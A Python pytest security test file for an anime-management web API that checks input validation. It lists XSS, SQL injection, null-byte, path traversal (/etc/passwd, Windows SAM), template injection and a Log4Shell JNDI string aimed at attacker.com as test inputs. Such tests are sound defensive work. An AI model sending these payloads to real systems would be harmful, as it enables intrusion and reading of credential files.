325 lines
11 KiB
Python
325 lines
11 KiB
Python
"""
|
|
Input Validation Security Tests.
|
|
|
|
This module tests input validation across the application to ensure
|
|
all user inputs are properly sanitized and validated.
|
|
"""
|
|
|
|
import pytest
|
|
from httpx import AsyncClient
|
|
|
|
from src.server.fastapi_app import app
|
|
|
|
|
|
@pytest.mark.security
|
|
class TestInputValidation:
|
|
"""Security tests for input validation."""
|
|
|
|
@pytest.fixture
|
|
async def client(self):
|
|
"""Create async HTTP client for testing."""
|
|
from httpx import ASGITransport
|
|
|
|
async with AsyncClient(
|
|
transport=ASGITransport(app=app), base_url="http://test"
|
|
) as ac:
|
|
yield ac
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_xss_in_anime_title(self, client):
|
|
"""Test XSS protection in anime title input."""
|
|
xss_payloads = [
|
|
"<script>alert('XSS')</script>",
|
|
"<img src=x onerror=alert('XSS')>",
|
|
"javascript:alert('XSS')",
|
|
"<svg onload=alert('XSS')>",
|
|
]
|
|
|
|
for payload in xss_payloads:
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={"title": payload, "description": "Test"},
|
|
)
|
|
|
|
# Should either reject or sanitize
|
|
if response.status_code == 200:
|
|
# If accepted, should be sanitized
|
|
data = response.json()
|
|
title = data.get("data", {}).get("title", "")
|
|
assert "<script>" not in title.lower()
|
|
assert "onerror" not in title.lower()
|
|
assert "javascript:" not in title.lower()
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_oversized_input(self, client):
|
|
"""Test handling of extremely large inputs."""
|
|
# Try very long string
|
|
huge_string = "A" * 1000000 # 1MB of data
|
|
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={"title": huge_string, "description": "Test"},
|
|
)
|
|
|
|
# Should reject or truncate
|
|
assert response.status_code in [400, 413, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_null_byte_injection(self, client):
|
|
"""Test null byte injection protection."""
|
|
null_byte_payloads = [
|
|
"filename.txt\x00.exe",
|
|
"test\x00admin",
|
|
"user\x00' OR '1'='1",
|
|
]
|
|
|
|
for payload in null_byte_payloads:
|
|
response = await client.post(
|
|
"/api/anime/search",
|
|
params={"query": payload},
|
|
)
|
|
|
|
# Should handle safely
|
|
assert response.status_code in [200, 400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_unicode_bypass_attempts(self, client):
|
|
"""Test handling of unicode bypass attempts."""
|
|
unicode_payloads = [
|
|
"admin\u202e", # Right-to-left override
|
|
"\ufeffadmin", # Zero-width no-break space
|
|
"ad\u200bmin", # Zero-width space
|
|
]
|
|
|
|
for payload in unicode_payloads:
|
|
response = await client.post(
|
|
"/api/auth/login",
|
|
json={"username": payload, "password": "test"},
|
|
)
|
|
|
|
# Should not bypass security
|
|
assert response.status_code in [401, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_path_traversal_in_file_access(self, client):
|
|
"""Test path traversal protection."""
|
|
traversal_payloads = [
|
|
"../../../etc/passwd",
|
|
"..\\..\\..\\windows\\system32\\config\\sam",
|
|
"....//....//....//etc/passwd",
|
|
"..%2F..%2F..%2Fetc%2Fpasswd",
|
|
]
|
|
|
|
for payload in traversal_payloads:
|
|
response = await client.get(f"/static/{payload}")
|
|
|
|
# Should not access sensitive files
|
|
# App returns error page (200) or proper error code
|
|
if response.status_code == 200:
|
|
# Verify it's an error page, not the actual file
|
|
content = response.text.lower()
|
|
assert (
|
|
"error" in content or
|
|
"not found" in content or
|
|
"<!doctype html>" in content
|
|
), "Response should be error page, not sensitive file"
|
|
else:
|
|
assert response.status_code in [400, 403, 404]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_negative_numbers_where_positive_expected(
|
|
self, client
|
|
):
|
|
"""Test handling of negative numbers in inappropriate contexts."""
|
|
response = await client.post(
|
|
"/api/downloads",
|
|
json={
|
|
"anime_id": -1,
|
|
"episode_number": -5,
|
|
"priority": -10,
|
|
},
|
|
)
|
|
|
|
# Should reject negative values
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_special_characters_in_username(self, client):
|
|
"""Test handling of special characters in usernames."""
|
|
special_chars = [
|
|
"user<script>",
|
|
"user@#$%^&*()",
|
|
"user\n\r\t",
|
|
"user'OR'1'='1",
|
|
]
|
|
|
|
for username in special_chars:
|
|
response = await client.post(
|
|
"/api/auth/register",
|
|
json={
|
|
"username": username,
|
|
"password": "SecureP@ss123!",
|
|
"email": "test@example.com",
|
|
},
|
|
)
|
|
|
|
# Should either reject or sanitize
|
|
if response.status_code == 200:
|
|
data = response.json()
|
|
registered_username = data.get("data", {}).get(
|
|
"username", ""
|
|
)
|
|
assert "<script>" not in registered_username
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_email_validation(self, client):
|
|
"""Test email format validation."""
|
|
invalid_emails = [
|
|
"notanemail",
|
|
"@example.com",
|
|
"user@",
|
|
"user space@example.com",
|
|
"user@example",
|
|
]
|
|
|
|
for email in invalid_emails:
|
|
response = await client.post(
|
|
"/api/auth/register",
|
|
json={
|
|
"username": f"user_{hash(email)}",
|
|
"password": "SecureP@ss123!",
|
|
"email": email,
|
|
},
|
|
)
|
|
|
|
# Should reject invalid emails
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_array_injection(self, client):
|
|
"""Test handling of array inputs in unexpected places."""
|
|
response = await client.post(
|
|
"/api/anime",
|
|
json={
|
|
"title": ["array", "instead", "of", "string"],
|
|
"description": "Test",
|
|
},
|
|
)
|
|
|
|
# Should reject or handle gracefully
|
|
assert response.status_code in [400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_object_injection(self, client):
|
|
"""Test handling of object inputs in unexpected places."""
|
|
response = await client.post(
|
|
"/api/anime/search",
|
|
params={"query": {"nested": "object"}},
|
|
)
|
|
|
|
# Should reject with proper error or handle gracefully
|
|
# API converts objects to strings and searches for them (returns [])
|
|
if response.status_code == 200:
|
|
# Verify it handled it safely (returned empty or error)
|
|
data = response.json()
|
|
assert isinstance(data, list)
|
|
# Should not have executed the object as code
|
|
assert "nested" not in str(data).lower() or len(data) == 0
|
|
else:
|
|
assert response.status_code in [400, 422]
|
|
|
|
|
|
@pytest.mark.security
|
|
@pytest.mark.requires_clean_auth
|
|
class TestAPIParameterValidation:
|
|
"""Security tests for API parameter validation."""
|
|
|
|
@pytest.fixture
|
|
async def client(self):
|
|
"""Create async HTTP client for testing."""
|
|
from httpx import ASGITransport
|
|
|
|
async with AsyncClient(
|
|
transport=ASGITransport(app=app), base_url="http://test"
|
|
) as ac:
|
|
yield ac
|
|
|
|
async def get_auth_token(self, client):
|
|
"""Helper to get authentication token."""
|
|
password = "SecurePass123!"
|
|
await client.post(
|
|
"/api/auth/setup",
|
|
json={"master_password": password}
|
|
)
|
|
login_response = await client.post(
|
|
"/api/auth/login",
|
|
json={"password": password}
|
|
)
|
|
return login_response.json()["access_token"]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_invalid_pagination_parameters(self, client):
|
|
"""Test handling of invalid pagination parameters."""
|
|
token = await self.get_auth_token(client)
|
|
headers = {"Authorization": f"Bearer {token}"}
|
|
|
|
invalid_params = [
|
|
{"page": -1, "per_page": 10},
|
|
{"page": 1, "per_page": -10},
|
|
{"page": 999999999, "per_page": 999999999},
|
|
{"page": "invalid", "per_page": "invalid"},
|
|
]
|
|
|
|
for params in invalid_params:
|
|
response = await client.get(
|
|
"/api/anime", params=params, headers=headers
|
|
)
|
|
|
|
# Should reject or use defaults, or 503 when service unavailable
|
|
assert response.status_code in [200, 400, 422, 503]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_injection_in_query_parameters(self, client):
|
|
"""Test injection protection in query parameters."""
|
|
injection_queries = [
|
|
"' OR '1'='1",
|
|
"<script>alert('XSS')</script>",
|
|
"${jndi:ldap://attacker.com/evil}",
|
|
"{{7*7}}",
|
|
]
|
|
|
|
for query in injection_queries:
|
|
response = await client.get(
|
|
"/api/anime/search", params={"query": query}
|
|
)
|
|
|
|
# Should handle safely
|
|
assert response.status_code in [200, 400, 422]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_missing_required_parameters(self, client):
|
|
"""Test handling of missing required parameters."""
|
|
response = await client.post("/api/auth/login", json={})
|
|
|
|
# Should reject with appropriate error
|
|
assert response.status_code == 422
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_extra_unexpected_parameters(self, client):
|
|
"""Test handling of extra unexpected parameters."""
|
|
response = await client.post(
|
|
"/api/auth/login",
|
|
json={
|
|
"username": "testuser",
|
|
"password": "test",
|
|
"unexpected_field": "malicious_value",
|
|
"is_admin": True, # Attempt to elevate privileges
|
|
},
|
|
)
|
|
|
|
# Should ignore extra params or reject
|
|
if response.status_code == 200:
|
|
# Should not grant admin from parameter
|
|
data = response.json()
|
|
assert not data.get("data", {}).get("is_admin", False)
|